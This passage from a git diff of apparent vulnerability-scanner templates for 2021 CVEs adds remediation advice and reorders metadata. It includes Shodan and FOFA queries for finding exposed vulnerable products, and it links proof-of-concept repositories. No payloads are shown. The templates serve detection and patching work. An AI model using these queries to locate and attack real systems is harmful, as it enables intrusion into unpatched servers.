expresstech product: quiz_and_survey_master + framework: wordpress tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 77571974a0..5f845862ba 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.97158 - cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* epss-percentile: 0.99701 + cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 99bcc230ed..cc7b6ddef1 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction. + remediation: | + Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability. reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-21087 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* epss-percentile: 0.49708 + cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2021,xss,adobe,misc,coldfusion http: diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 17b55dc513..533ed50151 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -6,6 +6,8 @@ info: severity: high description: | spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview". + remediation: | + Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator. reference: - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - https://github.com/cristianeph/vulnerability-actuator-log-viewer @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-21234 cwe-id: CWE-22 epss-score: 0.97064 - cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* epss-percentile: 0.99653 + cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: spring-boot-actuator-logview_project diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 28f99a1c65..94a8b42689 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. + remediation: | + Apply the latest security patches or updates provided by MinIO to fix this vulnerability. reference: - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-21287 cwe-id: CWE-918 epss-score: 0.97296 - cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* epss-percentile: 0.99792 + cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: minio diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index dbb3816a4b..da5b6ff56d 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -5,21 +5,21 @@ info: author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. + remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643 - remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 epss-score: 0.973 - cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* epss-percentile: 0.99795 + cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: lucee diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index c12f41757e..6fdf26fe38 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -5,28 +5,28 @@ info: author: Adam Crosser,pwnhxl severity: high description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Upgrade to version 4.7.9 or later. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - https://packagist.org/packages/vrana/adminer - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 - remediation: Upgrade to version 4.7.9 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 epss-score: 0.00795 - cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* epss-percentile: 0.79414 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 - fofa-query: app="Adminer" && body="4.7.8" - hunter-query: app.name="Adminer"&&web.body="4.7.8" - shodan-query: title:"Login - Adminer" vendor: adminer product: adminer + shodan-query: title:"Login - Adminer" + fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" tags: cve,cve2021,adminer,ssrf http: diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 837b1d4205..d36f09bba2 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -5,26 +5,26 @@ info: author: pikpikcu severity: high description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. + remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected reference: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ - https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v - https://www.npmjs.com/package/systeminformation - https://nvd.nist.gov/vuln/detail/CVE-2021-21315 - remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 epss-score: 0.97213 - cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* epss-percentile: 0.99738 + cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: systeminformation product: systeminformation + framework: node.js tags: nodejs,cve,cve2021,kev http: diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 6028c03e9b..7614877da1 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E - remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.35598 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.96598 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index b7dff9e07f..3d1a6cd115 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 - https://x-stream.github.io/CVE-2021-21351.html - https://paper.seebug.org/1543/ - http://x-stream.github.io/changes.html#1.4.16 - https://nvd.nist.gov/vuln/detail/CVE-2021-21351 - remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 epss-score: 0.9411 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.9883 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index c3474c74ac..dd77e79f93 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -5,26 +5,26 @@ info: author: lotusdll severity: high description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution. + remediation: This issue has been remediated in WordPress BuddyPress 7.2.1. reference: - https://github.com/HoangKien1020/CVE-2021-21389 - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/ - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 - https://nvd.nist.gov/vuln/detail/CVE-2021-21389 - remediation: This issue has been remediated in WordPress BuddyPress 7.2.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-21389 cwe-id: CWE-863 epss-score: 0.77888 - cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97815 + cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: buddypress product: buddypress + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress http: diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 79f7fa8e6a..7504730d05 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -6,28 +6,28 @@ info: severity: medium description: | Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk. + remediation: This is fixed in version 10.7.1. reference: - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 - https://nvd.nist.gov/vuln/detail/CVE-2021-21402 - remediation: This is fixed in version 10.7.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 epss-score: 0.23511 - cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* epss-percentile: 0.95936 + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: - max-request: 2 - fofa-query: title="Jellyfin" || body="http://jellyfin.media" - shodan-query: http.html:"Jellyfin" verified: true + max-request: 2 vendor: jellyfin product: jellyfin + shodan-query: http.html:"Jellyfin" + fofa-query: title="Jellyfin" || body="http://jellyfin.media" tags: cve,cve2021,jellyfin,lfi http: diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 0c87580294..7704b83310 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -7,6 +7,8 @@ info: description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. + remediation: | + Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-21479 cwe-id: CWE-74 epss-score: 0.00281 - cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* epss-percentile: 0.64444 + cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 4c83540473..03eb0255b8 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -7,6 +7,8 @@ info: description: | ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + remediation: | + Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability. reference: - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317 - https://nvd.nist.gov/vuln/detail/CVE-2021-21745 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-21745 cwe-id: CWE-352 epss-score: 0.23979 - cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* epss-percentile: 0.95971 + cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zte diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index b8c5f0acca..84b6766692 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + remediation: | + Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-21799 cwe-id: CWE-79 epss-score: 0.85976 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.98127 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"R-SeeNet" verified: true + max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"R-SeeNet" tags: cve,cve2021,xss,r-seenet http: diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 229dddf4f4..92d5e5cb7d 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality. + remediation: | + Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in R-SeeNet 2.4.12. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271 - https://nvd.nist.gov/vuln/detail/CVE-2021-21800 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-21800 cwe-id: CWE-79 epss-score: 0.85976 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.98127 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"R-SeeNet" verified: true + max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"R-SeeNet" tags: cve,cve2021,xss,r-seenet http: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 0cce3ed62a..af333276ef 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + remediation: | + Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - https://nvd.nist.gov/vuln/detail/CVE-2021-21801 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-21801 cwe-id: CWE-79 epss-score: 0.85976 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.98127 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index c7baa7093b..790bbd4238 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + remediation: | + Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - https://nvd.nist.gov/vuln/detail/CVE-2021-21801 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-21802 cwe-id: CWE-79 epss-score: 0.85976 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.98127 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 40518e646f..67cb755ed0 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + remediation: | + Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - https://nvd.nist.gov/vuln/detail/CVE-2021-21803 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-21803 cwe-id: CWE-79 epss-score: 0.85976 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.98127 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advantech diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 740f49ddee..e04f578486 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-21805 cwe-id: CWE-78 epss-score: 0.97394 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* epss-percentile: 0.99872 + cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"R-SeeNet" verified: true + max-request: 1 vendor: advantech product: r-seenet + shodan-query: http.html:"R-SeeNet" tags: cve,cve2021,rce,r-seenet http: diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index f01e3e4975..fc3413e87a 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade the router firmware to the latest version provided by D-Link. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - https://nvd.nist.gov/vuln/detail/CVE-2021-21816 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.00255 - cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* epss-percentile: 0.62674 + cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index e3f45e4d9d..252a994146 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability. + remediation: | + Apply the latest firmware update provided by Lantronix to mitigate the vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325 - https://nvd.nist.gov/vuln/detail/CVE-2021-21881 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-21881 cwe-id: CWE-78 epss-score: 0.97105 - cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* epss-percentile: 0.99673 + cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* metadata: max-request: 2 vendor: lantronix diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 5f1c2153e3..ef9460bab1 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + remediation: | + Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/unauth-rce-vmware/ - https://nvd.nist.gov/vuln/detail/CVE-2021-21972 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-21972 cwe-id: CWE-22 epss-score: 0.97432 - cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* epss-percentile: 0.99903 + cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index f1465778c7..e41937800f 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + remediation: | + Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://twitter.com/osama_hroot/status/1365586206982082560 - https://twitter.com/bytehx343/status/1486582542807420928 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-21973 cwe-id: CWE-918 epss-score: 0.17148 - cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* epss-percentile: 0.95393 + cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 53f47e5701..3e3707d769 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -5,6 +5,8 @@ info: author: luci severity: high description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983. + remediation: | + Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2021-0004.html - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-21975 cwe-id: CWE-918 epss-score: 0.97437 - cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:* epss-percentile: 0.9991 + cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 7edb67e2ed..1fde947a09 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -8,6 +8,8 @@ info: VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An 